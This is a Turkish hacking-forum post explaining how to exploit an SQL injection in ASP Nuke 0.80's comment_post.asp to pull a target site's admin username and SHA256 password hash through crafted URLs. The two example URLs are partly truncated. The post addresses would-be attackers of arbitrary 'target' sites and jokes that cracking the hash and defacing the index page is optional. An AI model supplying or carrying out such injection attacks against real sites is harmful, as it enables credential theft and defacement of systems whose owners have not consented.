ASPNuke 0.80 SQL Injection[Anlatım]

OuTLaWsys

Banned
Katılım
24 Haz 2005
Mesajlar
70
Reaction score
0
Puanları
0
########Document Written by OuTLaWsys###########
ASP Nuke versiyon 0.80 ile hazırlanmış sayfalardaki comment_post.asp dosyasındaki hatadan dolayı admin username ini ve passwordunun sha256 hashli halini alablirsiniz.
Adres çubugunda site adresinin sonuna ekleyeceğimiz bi kaç şey ile username ini ver pass i alabilrsiniz.
Örnek:
Username için:
http://www.hedefsite.com/module/sup...TaskID=Username
Password sha256 hashi için
http://www.hedefsite.com/modules/su...TaskID=Password

(sha256 hashi kırıp kırmamak size kalmıştır.İlla her yeri hackliyip index atcaksınız die bir kaide yoktur.Açık açıktır :) )
 
Geri
Üst